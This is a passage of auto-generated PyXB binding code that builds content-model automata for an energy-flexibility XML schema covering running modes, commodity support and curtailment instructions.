transitions.append(fac.Transition(st_6, [
fac.UpdateInstruction(cc_1, False) ]))
st_2._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_2, True) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_2, False) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_2, False) ]))
transitions.append(fac.Transition(st_6, [
fac.UpdateInstruction(cc_2, False) ]))
st_3._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_3, True) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_3, False) ]))
transitions.append(fac.Transition(st_6, [
fac.UpdateInstruction(cc_3, False) ]))
st_4._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_4, True) ]))
transitions.append(fac.Transition(st_6, [
fac.UpdateInstruction(cc_4, False) ]))
st_5._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_6, [
fac.UpdateInstruction(cc_5, True) ]))
st_6._set_transitionSet(transitions)
return fac.Automaton(states, counters, False, containing_state=None)
CTD_ANON_19._Automaton = _BuildAutomaton_56()
AdjustableDiscreteRunningMode._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'runningCost'), pyxb.binding.datatypes.decimal, scope=AdjustableDiscreteRunningMode, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 828, 5)))
AdjustableDiscreteRunningMode._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'electricalPower'), pyxb.binding.datatypes.double, scope=AdjustableDiscreteRunningMode, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 829, 5)))
AdjustableDiscreteRunningMode._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'gasFlowRate'), pyxb.binding.datatypes.double, scope=AdjustableDiscreteRunningMode, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 830, 5)))
AdjustableDiscreteRunningMode._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'heatTemperature'), pyxb.binding.datatypes.double, scope=AdjustableDiscreteRunningMode, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 831, 5)))
AdjustableDiscreteRunningMode._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'heatFlowRate'), pyxb.binding.datatypes.double, scope=AdjustableDiscreteRunningMode, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 832, 5)))
AdjustableDiscreteRunningMode._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'heatThermalPower'), pyxb.binding.datatypes.double, scope=AdjustableDiscreteRunningMode, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 833, 5)))
def _BuildAutomaton_57 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_57
del _BuildAutomaton_57
import pyxb.utils.fac as fac
counters = set()
cc_0 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 828, 5))
counters.add(cc_0)
cc_1 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 829, 5))
counters.add(cc_1)
cc_2 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 830, 5))
counters.add(cc_2)
cc_3 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 831, 5))
counters.add(cc_3)
cc_4 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 832, 5))
counters.add(cc_4)
cc_5 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 833, 5))
counters.add(cc_5)
states = []
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
symbol = pyxb.binding.content.ElementUse(AdjustableDiscreteRunningMode._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'runningCost')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 828, 5))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_1, False))
symbol = pyxb.binding.content.ElementUse(AdjustableDiscreteRunningMode._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'electricalPower')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 829, 5))
st_1 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_1)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_2, False))
symbol = pyxb.binding.content.ElementUse(AdjustableDiscreteRunningMode._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'gasFlowRate')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 830, 5))
st_2 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_2)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_3, False))
symbol = pyxb.binding.content.ElementUse(AdjustableDiscreteRunningMode._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'heatTemperature')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 831, 5))
st_3 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_3)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_4, False))
symbol = pyxb.binding.content.ElementUse(AdjustableDiscreteRunningMode._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'heatFlowRate')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 832, 5))
st_4 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_4)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_5, False))
symbol = pyxb.binding.content.ElementUse(AdjustableDiscreteRunningMode._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'heatThermalPower')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 833, 5))
st_5 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_5)
transitions = []
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_0, False) ]))
st_0._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_1, True) ]))
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_1, False) ]))
st_1._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_2, True) ]))
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_2, False) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_2, False) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_2, False) ]))
st_2._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_3, True) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_3, False) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_3, False) ]))
st_3._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_4, True) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_4, False) ]))
st_4._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_5, True) ]))
st_5._set_transitionSet(transitions)
return fac.Automaton(states, counters, True, containing_state=None)
AdjustableDiscreteRunningMode._Automaton = _BuildAutomaton_57()
AdjustableContinuousRunningMode._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'lowerBound'), CTD_ANON_20, scope=AdjustableContinuousRunningMode, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 852, 5)))
AdjustableContinuousRunningMode._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'upperBound'), CTD_ANON_21, scope=AdjustableContinuousRunningMode, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 859, 5)))
def _BuildAutomaton_58 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_58
del _BuildAutomaton_58
import pyxb.utils.fac as fac
counters = set()
states = []
final_update = None
symbol = pyxb.binding.content.ElementUse(AdjustableContinuousRunningMode._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'lowerBound')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 852, 5))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
final_update = set()
symbol = pyxb.binding.content.ElementUse(AdjustableContinuousRunningMode._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'upperBound')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 859, 5))
st_1 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_1)
transitions = []
transitions.append(fac.Transition(st_1, [
]))
st_0._set_transitionSet(transitions)
transitions = []
st_1._set_transitionSet(transitions)
return fac.Automaton(states, counters, False, containing_state=None)
AdjustableContinuousRunningMode._Automaton = _BuildAutomaton_58()
def _BuildAutomaton_59 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_59
del _BuildAutomaton_59
import pyxb.utils.fac as fac
counters = set()
cc_0 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 840, 3))
counters.add(cc_0)
cc_1 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 841, 3))
counters.add(cc_1)
cc_2 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 842, 3))
counters.add(cc_2)
cc_3 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 843, 3))
counters.add(cc_3)
cc_4 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 844, 3))
counters.add(cc_4)
cc_5 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 845, 3))
counters.add(cc_5)
states = []
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
symbol = pyxb.binding.content.ElementUse(CTD_ANON_20._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'runningCost')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 840, 3))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_1, False))
symbol = pyxb.binding.content.ElementUse(CTD_ANON_20._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'electricalPower')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 841, 3))
st_1 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_1)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_2, False))
symbol = pyxb.binding.content.ElementUse(CTD_ANON_20._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'gasFlowRate')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 842, 3))
st_2 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_2)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_3, False))
symbol = pyxb.binding.content.ElementUse(CTD_ANON_20._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'heatTemperature')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 843, 3))
st_3 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_3)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_4, False))
symbol = pyxb.binding.content.ElementUse(CTD_ANON_20._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'heatFlowRate')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 844, 3))
st_4 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_4)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_5, False))
symbol = pyxb.binding.content.ElementUse(CTD_ANON_20._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'heatThermalPower')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 845, 3))
st_5 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_5)
transitions = []
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_0, False) ]))
st_0._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_1, True) ]))
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_1, False) ]))
st_1._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_2, True) ]))
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_2, False) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_2, False) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_2, False) ]))
st_2._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_3, True) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_3, False) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_3, False) ]))
st_3._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_4, True) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_4, False) ]))
st_4._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_5, True) ]))
st_5._set_transitionSet(transitions)
return fac.Automaton(states, counters, True, containing_state=None)
CTD_ANON_20._Automaton = _BuildAutomaton_59()
def _BuildAutomaton_60 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_60
del _BuildAutomaton_60
import pyxb.utils.fac as fac
counters = set()
cc_0 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 840, 3))
counters.add(cc_0)
cc_1 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 841, 3))
counters.add(cc_1)
cc_2 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 842, 3))
counters.add(cc_2)
cc_3 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 843, 3))
counters.add(cc_3)
cc_4 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 844, 3))
counters.add(cc_4)
cc_5 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 845, 3))
counters.add(cc_5)
states = []
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
symbol = pyxb.binding.content.ElementUse(CTD_ANON_21._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'runningCost')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 840, 3))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_1, False))
symbol = pyxb.binding.content.ElementUse(CTD_ANON_21._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'electricalPower')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 841, 3))
st_1 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_1)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_2, False))
symbol = pyxb.binding.content.ElementUse(CTD_ANON_21._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'gasFlowRate')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 842, 3))
st_2 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_2)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_3, False))
symbol = pyxb.binding.content.ElementUse(CTD_ANON_21._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'heatTemperature')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 843, 3))
st_3 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_3)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_4, False))
symbol = pyxb.binding.content.ElementUse(CTD_ANON_21._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'heatFlowRate')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 844, 3))
st_4 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_4)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_5, False))
symbol = pyxb.binding.content.ElementUse(CTD_ANON_21._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'heatThermalPower')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 845, 3))
st_5 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_5)
transitions = []
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_0, False) ]))
st_0._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_1, True) ]))
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_1, False) ]))
st_1._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_2, True) ]))
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_2, False) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_2, False) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_2, False) ]))
st_2._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_3, True) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_3, False) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_3, False) ]))
st_3._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_4, True) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_4, False) ]))
st_4._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_5, True) ]))
st_5._set_transitionSet(transitions)
return fac.Automaton(states, counters, True, containing_state=None)
CTD_ANON_21._Automaton = _BuildAutomaton_60()
CTD_ANON_22._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'supportedCommodities'), SupportedCommodities, scope=CTD_ANON_22, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 220, 6)))
def _BuildAutomaton_61 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_61
del _BuildAutomaton_61
import pyxb.utils.fac as fac
counters = set()
cc_0 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 48, 5))
counters.add(cc_0)
states = []
final_update = None
symbol = pyxb.binding.content.ElementUse(CTD_ANON_22._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'header')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 24, 3))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
final_update = None
symbol = pyxb.binding.content.ElementUse(CTD_ANON_22._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'instructionProcessingDelay')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 46, 5))
st_1 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_1)
final_update = None
symbol = pyxb.binding.content.ElementUse(CTD_ANON_22._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'deviceDescription')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 47, 5))
st_2 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_2)
final_update = None
symbol = pyxb.binding.content.ElementUse(CTD_ANON_22._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'currency')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 48, 5))
st_3 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_3)
final_update = set()
symbol = pyxb.binding.content.ElementUse(CTD_ANON_22._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'supportedCommodities')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 220, 6))
st_4 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_4)
transitions = []
transitions.append(fac.Transition(st_1, [
]))
st_0._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_2, [
]))
st_1._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_3, [
]))
transitions.append(fac.Transition(st_4, [
]))
st_2._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_0, False) ]))
st_3._set_transitionSet(transitions)
transitions = []
st_4._set_transitionSet(transitions)
return fac.Automaton(states, counters, False, containing_state=None)
CTD_ANON_22._Automaton = _BuildAutomaton_61()
def _BuildAutomaton_62 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_62
del _BuildAutomaton_62
import pyxb.utils.fac as fac
counters = set()
states = []
final_update = None
symbol = pyxb.binding.content.ElementUse(InflexibleUpdate._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'header')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 24, 3))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
final_update = None
symbol = pyxb.binding.content.ElementUse(InflexibleUpdate._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'flexibilityUpdateId')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 57, 5))
st_1 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_1)
final_update = set()
symbol = pyxb.binding.content.ElementUse(InflexibleUpdate._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'validFrom')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 58, 5))
st_2 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_2)
transitions = []
transitions.append(fac.Transition(st_1, [
]))
st_0._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_2, [
]))
st_1._set_transitionSet(transitions)
transitions = []
st_2._set_transitionSet(transitions)
return fac.Automaton(states, counters, False, containing_state=None)
InflexibleUpdate._Automaton = _BuildAutomaton_62()
CTD_ANON_23._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'curtailmentProfile'), CurtailmentProfile, scope=CTD_ANON_23, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 323, 6)))
def _BuildAutomaton_63 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_63
del _BuildAutomaton_63
import pyxb.utils.fac as fac
counters = set()
states = []
final_update = None
symbol = pyxb.binding.content.ElementUse(CTD_ANON_23._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'header')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 24, 3))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
final_update = None
symbol = pyxb.binding.content.ElementUse(CTD_ANON_23._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'instructionId')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 67, 5))
st_1 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_1)
final_update = None
symbol = pyxb.binding.content.ElementUse(CTD_ANON_23._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'flexibilityUpdateId')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 68, 5))
st_2 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_2)
final_update = None
symbol = pyxb.binding.content.ElementUse(CTD_ANON_23._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'isEmergencyInstruction')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 69, 5))
st_3 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_3)
final_update = set()
symbol = pyxb.binding.content.ElementUse(CTD_ANON_23._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'curtailmentProfile')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 323, 6))
st_4 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_4)
transitions = []
transitions.append(fac.Transition(st_1, [
]))
st_0._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_2, [
]))
st_1._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_3, [
]))
st_2._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_4, [
]))
